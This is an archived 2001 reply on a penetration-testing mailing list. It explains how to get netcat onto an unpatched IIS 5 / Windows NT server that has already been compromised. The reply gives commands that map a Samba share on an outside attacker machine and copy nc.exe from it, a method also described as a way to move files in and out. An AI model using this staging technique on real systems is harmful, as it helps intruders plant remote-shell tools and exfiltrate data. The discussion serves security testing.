Penetration Testing mailing list archives
Re: pen testing iis 5
From: Stephen Friedl <friedl () mtndew com>
Date: Thu, 21 Jun 2001 15:31:24 -0700
I am pen-testing IIS 5 [no hotfixes] running in WinNT 4.0 with no fixes. At this point I want to upload a file to the box [nc.exe] and then I will definately have the box. How can I go about doing this?
If the network can do outbound NETBIOS, I open up a public Samba share
on a machine on MY network outside the firewall. Then, when hacking the
remote machine I do
mkdir c:\foo working area
net use q: \\my.box\public think globally...
xcopy q:\nc.exe c:\foo copy locally...
Now the file is in your local work area, and it's a piece of cake
to get stuff in and out via the "Q:" drive. Works like a champ.
Steve
---
Stephen J Friedl | Software Consultant | Tustin, CA | +1 714 544-6561
www.unixwiz.net | I speak for me only | KA8CMY | steve () unixwiz net
Current thread:
- pen testing iis 5 ExpLiciT (Jun 21)
- Re: pen testing iis suntzu (Jun 24)
- Re: pen testing iis Enrique A. Sanchez Montellano (Jun 27)
- Re: pen testing iis Javier Fernandez-Sanguino Peña (Jun 28)
- Re: pen testing iis Enrique A. Sanchez Montellano (Jun 27)
- Re: pen testing iis 5 Javier Fernandez-Sanguino Peña (Jun 27)
- <Possible follow-ups>
- Re: pen testing iis 5 Stephen Friedl (Jun 22)
- Re: pen testing iis 5 Reverend Lola (Jun 22)
- RE: pen testing iis 5 dilbert96 (Jun 24)
- RE: pen testing iis 5 st0ff st0ff (Jun 25)
- Pen Testing a Oracle database. How to pull data? Osvaldo J . Filho (Jun 26)
- RE: Pen Testing a Oracle database. How to pull data? Aaron C. Newman (Jun 26)
- RE: Pen Testing a Oracle database. How to pull data? George Milliken (Jun 26)
- Pen Testing a Oracle database. How to pull data? Osvaldo J . Filho (Jun 26)
- Re: pen testing iis suntzu (Jun 24)